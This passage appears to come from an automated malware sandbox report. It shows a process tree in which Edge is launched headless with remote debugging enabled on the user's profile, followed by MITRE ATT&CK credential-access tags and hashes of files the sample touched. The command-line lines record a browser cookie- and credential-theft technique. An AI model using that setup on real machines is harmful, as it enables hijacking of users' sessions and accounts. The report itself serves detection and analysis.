C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2244,i,15104328723932887715,17636052688980897981,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:25⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2672,i,15104328723932887715,17636052688980897981,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2668 /prefetch:85⤵PID:2164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15104328723932887715,17636052688980897981,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3464 /prefetch:15⤵
- Uses browser remote debugging
PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3484,i,15104328723932887715,17636052688980897981,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:15⤵
- Uses browser remote debugging
PID:5112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5084,i,15104328723932887715,17636052688980897981,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:15⤵
- Uses browser remote debugging
PID:5784
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1616
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4368
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD583bcdc9502172135d3168352319a0bb9
SHA11f08e3da8ec91602eab3a2bff143e2f16f39983d
SHA2569658ff3bc0b2639c58d53b5078e89c5c4d844d3449c7bb995360024216a25910
SHA5122aef44642b9e14d39c31f31a21afd50faeb2a461c15dfba2b5671b17d07a1c6d17fdabff186aafa4baf9507ee805a3bcba184bee48b708af14998d49fae9c69b
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5a204a4037d069034bd0cf891063f9b6d
SHA12c6aea820c4fa0663a6fe69fe6cbf33d75a96f7d
SHA256dcd5de5bd976d5918f171e999613546dfa81a0c6f0adbc10a94785d4b1015611
SHA5120dd17c931aea43bb15d03d4ccbad0f66e112b0df5b179a388ca1db771cc6556f8cab2b3f4ea7aedc3190a025a377b662904c7cff5f1d5caf6fce0a037476302d
-
Filesize
280B
MD501cc3a42395638ce669dd0d7aba1f929
SHA189aa0871fa8e25b55823dd0db9a028ef46dfbdd8
SHA256d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee
SHA512d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\17fa3423-a6fd-436f-97eb-3a4a69013de2.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize327B
MD5e88d637f3a4264113a3a76dd53994141
SHA187925ed4d597c2dbfda95257613ece8463b2d1c4
SHA256fbf2db9e5eec9aff21b37bd7f9a0e1a739d4a725fd0697e468469753c73b7d91
SHA512b99b33cfc02db71ec2cd484a419fb79629826aad90057ec027d7cc046bd5c1cbcdd4651154a796e230ef96fd9a6b2581459b4d4723d39722195fd49053c9acf0
-
Filesize
40KB
MD52b7506e257a4efcee254ab25aba3971e
SHA144f4de8dbdc4b7dc4850873bca26dee82b3d6416
SHA256ca5cf8b50966418e8daf3fc9755677eb937246fc33d8e53d02c7cdfe3ecdf3f0
SHA512a914b7c9e231d7010f2dd3110644276cea73f731277bb77f8915bc47e01604654bef8d024972931db7ef6ec8bd869bde1aaeb2fa34b68c26e22c88bfc479780e
-
Filesize
40KB
MD52648c31f96dacfecf509d1a9e844ec75
SHA190055650b588821f6453a4fde400f85bb6f88493
SHA256705c179a14ffa20ca3187e1972b109d3afcadce6e81a0938f52ea0e30c406852
SHA512be6930809978062237c2b8d7e939f32e71a74714e241a6e907120c20282ea923b2e46fefc46937f7f95dc9d5e92f30d36063e72686ddc56ca0f4e4c4f082b9e9
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
286B
MD51df3b14cc10ee55877c2dfd9b587ac87
SHA109cf3991b16179b3efc47e61be056fc1ca84289a
SHA2562fc870b2e4f0d98fd43eb34157560de143b432aeae26988e612f5d15bbcd0b2e
SHA512ab0806852d21101403c4d8cc1e66eba125318134cd3777f08d72e7791442a44cfa127403e2909354d6a1d11ce320fe48e3770f1bfb876397aace88bcc0a31cfd
-
Filesize
5.7MB
MD57cbfcf1b8eb95b00a52c8545858247f4
SHA1144a1e5ef70cc427c9eab0bdbe750029a8b1f311
SHA2566a285a9511a2eea7d847566cfc5b5e2b79d1b8f173d134da7f90f8b6017d2f5d
SHA512b6cb800865689d30ef598d3fc4f21fd838557448dc1b295a8cbdd1282c9b78e4ca120b4f8d27e6ca0194c6ec8c9255c565150e880834f2f9a8dc3001a24d4f68